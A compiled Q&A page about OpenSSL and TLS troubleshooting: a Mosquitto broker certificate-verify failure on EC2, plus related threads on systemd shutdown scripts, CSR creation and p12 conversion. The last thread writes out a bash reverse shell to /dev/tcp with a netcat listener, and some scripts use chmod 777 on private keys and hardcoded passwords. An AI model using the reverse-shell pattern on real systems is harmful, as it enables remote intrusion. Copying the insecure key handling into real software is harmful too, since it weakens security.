Mosquitto SSL routines:tls_process_server_certificate:certificate verify failed Error: Protocol error - amazon-ec2

I use this GitHub repository to implement the establishment of a broker in AWS EC2.
https://github.com/chiachin2686/oqs-demos/tree/main/mosquitto
broker-start.sh
```
#!/bin/bash
# generate the configuration file for mosquitto
echo -e "
## Listeners
listener 8883
max_connections -1
max_qos 2
protocol mqtt
## General configuration
allow_anonymous false
# Comment out the following two lines if using two-way authentication
#password_file /test/passwd
#acl_file /test/acl
## Certificate based SSL/TLS support
cafile /test/cert/CA.crt
keyfile /test/cert/server.key
certfile /test/cert/server.crt
tls_version tlsv1.3
ciphers_tls1.3 TLS_AES_128_GCM_SHA256
# Comment out the following two lines if using one-way authentication
require_certificate true
## Same as above
use_identity_as_username true
" > mosquitto.conf
# generate the password file(add username and password) for the mosquitto MQTT broker
mosquitto_passwd -b -c passwd user1 1234
# generate the Access Control List
echo -e "user user1\ntopic readwrite test/sensor1" > acl
mkdir cert
# copy the CA key and the cert to the cert folder
cp /test/CA.key /test/CA.crt /test/cert
# generate the new server CSR using pre-set CA.key & cert
openssl req -new -newkey $SIG_ALG -keyout /test/cert/server.key -out /test/cert/server.csr -nodes -subj "/O=test-server/CN=$BROKER_IP"
# generate the server cert
openssl x509 -req -in /test/cert/server.csr -out /test/cert/server.crt -CA /test/cert/CA.crt -CAkey /test/cert/CA.key -CAcreateserial -days 365
# modify file permission
chmod 777 cert/*
# execute the mosquitto MQTT broker
mosquitto -c mosquitto.conf -v
```
Then I enter the following command in EC2 to enable broker:
```
sudo docker run -it --rm --net=host --name oqs-mosquitto-demo -p 8883:8883 -e "BROKER_IP=<Public IP in ec2>" -e "EXAMPLE=broker-start.sh" oqs-mosquitto-img
```
In the second step, I enter the following command in my VirtualBox (Ubuntu) to enable publisher-start.sh
publisher-start.sh
```
#!/bin/bash
mkdir cert
# copy the CA key and the cert to the cert folder
cp /test/CA.key /test/CA.crt /test/cert
# generate the new publisher CSR using pre-set CA.key & cert
openssl req -new -newkey $SIG_ALG -keyout /test/cert/publisher.key -out /test/cert/publisher.csr -nodes -subj "/O=test-publisher/CN=$PUB_IP"
# generate the publisher cert
openssl x509 -req -in /test/cert/publisher.csr -out /test/cert/publisher.crt -CA /test/cert/CA.crt -CAkey /test/cert/CA.key -CAcreateserial -days 365
# modify file permissions
chmod 777 cert/*
# execute the mosquitto MQTT publisher
mosquitto_pub -h $BROKER_IP -m "Hello world." -t test/sensor1 -q 0 -i "Client_pub" -d --repeat 60 --repeat-delay 1 \
--tls-version tlsv1.3 --cafile /test/cert/CA.crt \
--cert /test/cert/publisher.crt --key /test/cert/publisher.key
```
Then I enter the following command in ec2 to enable broker:
```
sudo docker run -it --rm --net=host -p 8883:8883 --name oqs-mosquitto-publisher -e "BROKER_IP=<Public IP in ec2>" -e "EXAMPLE=publisher-start.sh" oqs-mosquitto-img
```
This is the broker message in EC2:
```
1670399106: Warning: Unable to drop privileges to 'mosquitto' because this user does not exist. Trying 'nobody' instead.
1670399106: mosquitto version 2.0.15 starting
1670399106: Config loaded from mosquitto.conf.
1670399106: Opening ipv4 listen socket on port 8883.
1670399106: Opening ipv6 listen socket on port 8883.
1670399106: mosquitto version 2.0.15 running
1670399120: New connection from 49.216.40.44:8247 on port 8883.
1670399120: OpenSSL Error[0]: error:1409441B:SSL routines:ssl3_read_bytes:tlsv1 alert decrypt error
1670399120: Client <unknown> disconnected: Protocol error.
```
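The error in the title is what the client reports when it cannot validate the broker's certificate against the file passed as --cafile. The following added example (not part of the post or of the oqs-demos repository) reproduces that check with two constructed CAs; RSA keys stand in for $SIG_ALG, and 192.0.2.10 and the CA names are assumptions.

```bash
#!/bin/bash
# Added example: everything lives in a constructed temp directory.
D="$(mktemp -d)"

make_ca() {             # $1 = CA name; creates $1.key and a self-signed $1.crt
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=$1" \
    -keyout "$D/$1.key" -out "$D/$1.crt" 2>/dev/null
}

issue_server_cert() {   # $1 = signing CA name; same two steps as broker-start.sh
  openssl req -new -newkey rsa:2048 -nodes -subj "/O=test-server/CN=192.0.2.10" \
    -keyout "$D/server.key" -out "$D/server.csr" 2>/dev/null
  openssl x509 -req -in "$D/server.csr" -out "$D/server.crt" -days 365 \
    -CA "$D/$1.crt" -CAkey "$D/$1.key" -CAcreateserial 2>/dev/null
}

chains_to() {           # $1 = CA name; succeeds if server.crt verifies against that CA
  openssl verify -CAfile "$D/$1.crt" "$D/server.crt" 2>/dev/null | grep -q ': OK$'
}

ca_fingerprint() {      # $1 = CA name; value to compare between broker and client hosts
  openssl x509 -in "$D/$1.crt" -noout -fingerprint -sha256
}

make_ca broker-host-CA   # CA that signed the broker certificate
make_ca client-host-CA   # a different CA.crt, as another host might hold
issue_server_cert broker-host-CA

chains_to broker-host-CA && echo "same CA: verify OK"
chains_to client-host-CA || echo "different CA: certificate verify failed"
ca_fingerprint broker-host-CA
ca_fingerprint client-host-CA
```

Running the same verify and fingerprint commands against /test/cert/CA.crt and /test/cert/server.crt on each host shows whether both sides hold the same CA.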

Related

certificate created by elasticsearch-certutil is not usable in production?

I've followed the instructions on https://www.elastic.co/guide/en/elastic-stack-get-started/7.4/get-started-docker.html#get-started-docker-tls to set up basic authentication.
The doc creates the certificate by
```
bash -c '
yum install -y -q -e 0 unzip;
if [[ ! -f /certs/bundle.zip ]]; then
bin/elasticsearch-certutil cert --silent --pem --in config/certificates/instances.yml -out /certs/bundle.zip;
unzip /certs/bundle.zip -d /certs;
fi;
chown -R 1000:0 /certs
'
```
It seems I can connect to the https endpoint from localhost only, is it?
Yes, Elastic can generate a CSR to be signed by a public CA or a corporate CA, or it can just issue a self-signed certificate.
So if you issued a self-signed certificate, sure, you can use it in production, but with the "no verify certificate" option. Otherwise you can buy a certificate or order a free one, for example from Let's Encrypt.

How to execute openssl command at shutdown and reboot?

I want to encrypt a file and log the time at shutdown or reboot.
Here is what I do.
1. Edit a bash script file to execute at shutdown or reboot.
vim log.sh
```
key="123456"
openssl enc -des3 -a -salt -in $HOME/test -k ${key} -out $HOME/test.asc
date >> /home/log.info
```
2. Edit a log.service
sudo vim /etc/systemd/system/log.service
```
[Unit]
Description=Run command at shutdown
Before=shutdown.target reboot.target
[Service]
Type=oneshot
RemainAfterExit=true
ExecStop=/bin/bash /home/log.sh
[Install]
WantedBy=multi-user.target
```
3. systemctl enable log.service
4. reboot
After reboot I found that there is date info in /home/log.info, which means date >> /home/log.info executed; there is no $HOME/test.asc, which means openssl enc -des3 -a -salt -in $HOME/test -k ${key} -out $HOME/test.asc did not execute.
The commands run successfully in a terminal.
```
key="123456"
openssl enc -des3 -a -salt -in $HOME/test -k ${key} -out $HOME/test.asc
```
How do I fix my log.service file /etc/systemd/system/log.service so that the openssl command is executed at shutdown and reboot?
The issue is that ${HOME} doesn't expand to what you expect. When I try it on my system it expands to nothing. So ${HOME}/test becomes /test. You can check this by redirecting the error output for your openssl command in log.sh:
```
openssl enc -des3 -a -salt -in $HOME/test -k ${key} -out $HOME/test.asc 2> /home/log.error
```
Solution 1:
Use absolute paths in log.sh
Solution 2:
Add User= in service section of log.service. In this case make sure that the user has rights to write to the different locations where you want to write. For reference see systemd.exec
$USER, $LOGNAME, $HOME, $SHELL
User name (twice), home directory, and the login shell. The variables are set for the units that have User= set, which includes user systemd instances
Before= is documented in man systemd.unit. It's not intended for this use case. Also documented there are WantedBy= and RequiredBy=. The latter sounds like what is desired here, but if your logging fails, it could block shutdown. WantedBy= won't block shutdown if it fails. Read about them both and see which one fits your case better.
I would recommend a file structure like this:
```
[Unit]
Description=Run command at shutdown
[Service]
Type=oneshot
RemainAfterExit=true
ExecStop=/bin/bash /home/log.sh
[Install]
WantedBy=shutdown.target reboot.target
```
Your Install block was setting the service to start at boot time, which is not what you want. The new syntax will set the service to be active at shutdown time when you use systemctl enable log.service to enable it.
I have not tested this method of run-at-shutdown with systemd. Let us know how it works!
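The $HOME behaviour described in the first answer can be reproduced without rebooting. This added example (not from the thread) runs the question's log.sh pattern and the absolute-path variant of Solution 1 with an emptied environment; the temp directory stands in for /home, and env -i is only an approximation of a system unit without User=.

```bash
#!/bin/bash
# Added example: WORK is a constructed temp directory standing in for /home.
WORK="$(mktemp -d)"
echo "sample data" > "$WORK/test"

# Approximates a unit without User=: no HOME, USER or LOGNAME in the environment.
run_as_unit() { env -i PATH="$PATH" bash "$1"; }

# Variant A: input path built from $HOME, as in the question's log.sh.
cat > "$WORK/log_home.sh" <<EOF
key="123456"
openssl enc -des3 -a -salt -in "\$HOME/test" -k "\$key" -out "$WORK/a.asc" 2> "$WORK/a.error"
date >> "$WORK/a.info"   # still runs: nothing stops the script after openssl fails
EOF

# Variant B: Solution 1 from the answer, every path absolute.
cat > "$WORK/log_abs.sh" <<EOF
key="123456"
openssl enc -des3 -a -salt -in "$WORK/test" -k "\$key" -out "$WORK/b.asc" 2> "$WORK/b.error"
date >> "$WORK/b.info"
EOF

run_as_unit "$WORK/log_home.sh"
run_as_unit "$WORK/log_abs.sh"

variant_a_encrypted()   { [ -s "$WORK/a.asc" ]; }    # expected: false
variant_a_logged_date() { [ -s "$WORK/a.info" ]; }   # expected: true
variant_b_encrypted()   { [ -s "$WORK/b.asc" ]; }    # expected: true

cat "$WORK/a.error"      # the openssl error names the path it actually tried to open
variant_a_encrypted || echo "A: no ciphertext written, date still logged"
variant_b_encrypted && echo "B: ciphertext written"
```

Variant A matches what the question observed: the date line is logged while the encrypted file is missing.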

Openssl: cat: /dev/fd/63: No such file or directory

I try to create a Certificate Signing Request (CSR) using
```
openssl req -new -sha256 -key domain.key -subj "/" \ -reqexts SAN -config <(cat /System/Library/OpenSSL/openssl.cnf \ <(printf "[SAN]\nsubjectAltName=DNS:foo.com,DNS:www.foo.com"))
```
but I am getting the following error message on my MacBook
```
cat: /dev/fd/63: No such file or directory
unknown option -reqexts
```
Any ideas?
Your command is probably copy&paste of a multi-line command where backslashes are used to join lines, however you somehow managed to get newlines converted to spaces.
Remove all occurrences of "backslash + space".
I came across this question and in my case I did not have any \ , but I was using sudo so I had to use sudo su -c
```
$ sudo su -c 'openssl req -x509 -nodes -days 3650 -newkey rsa:2048 -keyout /etc/ssl/private/nginx-blah.blah.com.key -new -out /etc/ssl/certs/nginx-blah.blah.com.crt -subj "/O=blah.com/OU=blah/CN=blah.blah.com" -reqexts SAN -extensions SAN -config <(cat /etc/ssl/openssl.cnf <(printf "[SAN]\nsubjectAltName=DNS:blah.blah.com,IP:192.168.174.128")) -sha256'
```
In some cases, devpts not being mounted can lead to the same error being printed. So it was necessary to do:
```
mount -t devpts devpts /dev/pts
```
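All three answers trace the error to the /dev/fd path created by <(...). This added example (not from the thread) writes the [SAN] section to a regular temp file instead and then confirms the names are in the CSR; the minimal [req]/[dn] sections, the CN and the throwaway key are assumptions, since the question used the system openssl.cnf and -subj "/".

```bash
#!/bin/bash
# Added example: constructed key and config in a temp directory.
D="$(mktemp -d)"

make_csr_with_san() {   # $1 = SAN list, e.g. DNS:foo.com,DNS:www.foo.com
  # A regular file works the same under sudo, plain sh, or without /dev/fd.
  cat > "$D/san.cnf" <<EOF
[req]
prompt = no
distinguished_name = dn
[dn]
CN = foo.com
[SAN]
subjectAltName = $1
EOF
  openssl genrsa -out "$D/domain.key" 2048 2>/dev/null
  openssl req -new -sha256 -key "$D/domain.key" -subj "/CN=foo.com" \
    -reqexts SAN -config "$D/san.cnf" -out "$D/domain.csr"
}

csr_sans() {            # print the CSR's SAN line with spaces stripped
  openssl req -in "$D/domain.csr" -noout -text |
    grep -A1 'Subject Alternative Name' | tail -n1 | tr -d ' '
}

make_csr_with_san "DNS:foo.com,DNS:www.foo.com"
csr_sans
rm -f "$D/san.cnf"      # the config is only needed while the CSR is generated
```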

entering password into openssl command from shell script

I am trying to convert a p12 to a pem from a shell script without any user input.
I can have the password as a variable within the script.
So when I call:
```
openssl pkcs12 -in *.p12 -out cert.pem -nodes
```
The terminal prints "Enter Import Password:" and waits for input.
I tried to pipe the password in with:
```
echo $PASS | openssl pkcs12 -in *.p12 -out cert.pem -nodes
```
as well as trying to use a flag with the openssl command but can't figure out how to do this.
This one-liner worked for me:
```
openssl pkcs12 -in certificate.p12 -password pass:<your_password> -nodes | openssl x509 -noout -enddate
```
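The pipe in the question is ignored because openssl reads the import password from the terminal unless told otherwise, and the pass: form puts the password into the process arguments. This added example (not from the thread) uses -passin stdin, which makes the piped form work; the key, certificate and password are constructed for the demonstration.

```bash
#!/bin/bash
# Added example: constructed key, certificate and password in a temp directory.
D="$(mktemp -d)"
PASS='constructed-example-password'

make_p12() {      # build a throwaway certificate.p12 protected with $PASS
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=example.test" \
    -keyout "$D/key.pem" -out "$D/crt.pem" 2>/dev/null
  printf '%s\n' "$PASS" | openssl pkcs12 -export -inkey "$D/key.pem" \
    -in "$D/crt.pem" -out "$D/certificate.p12" -passout stdin
}

p12_to_pem() {    # $1 = password; no prompt, nothing secret on the openssl command line
  printf '%s\n' "$1" | openssl pkcs12 -in "$D/certificate.p12" \
    -out "$D/cert.pem" -nodes -passin stdin 2>/dev/null
}

pem_has_cert_and_key() {
  grep -q 'BEGIN CERTIFICATE' "$D/cert.pem" && grep -q 'PRIVATE KEY' "$D/cert.pem"
}

wrong_password_rejected() {   # a bad password must fail instead of prompting
  ! printf '%s\n' "not-the-password" | openssl pkcs12 -in "$D/certificate.p12" \
      -nodes -passin stdin >/dev/null 2>&1
}

make_p12
p12_to_pem "$PASS" && pem_has_cert_and_key && echo "converted without a prompt"
wrong_password_rejected && echo "wrong password rejected"
```

With -nodes the private key in cert.pem is unencrypted, so the output file needs restrictive permissions.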

Encrypting Netcat data with OpenSSL

So I have a basic communication stream that is managed by netcat. A user can create a bash shell and forward control to localhost at port 5555, for example. How could you pipe this through OpenSSL to achieve a connection that is symmetrically encrypted? I am only able to work with tools that come installed on an OSX machine.
Create Shell
```
bash -i >& /dev/tcp/localhost/5555 0>&1
```
Catch Shell
```
nc -l -p 5555
```
Encrypt data with OpenSSL
```
openssl aes-256-cbc -salt -a -e -in plaintext.txt -out encrypted.txt
```
Decrypt data with OpenSSL
```
openssl aes-256-cbc -salt -a -d -in encrypted.txt -out plaintext.txt
```
Kind of what I'm looking for
```
bash -i & | openssl -e > /dev/tcp/localhost/5555 0>&1
nc -l -p 5555 | openssl -d
```
Based on additional information from your comment, install MacPorts, and try to use ported socat or stunnel.
```
dtpwmbp:~ pwadas$ uname -a ; sudo port list |egrep -i socat\|stunnel
Darwin dtpwmbp 12.4.0 Darwin Kernel Version 12.4.0: Wed May 1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64
stunnel #4.47 security/stunnel
socat #1.7.2.1 sysutils/socat
dtpwmbp:~ pwadas$
```
http://www.macports.org
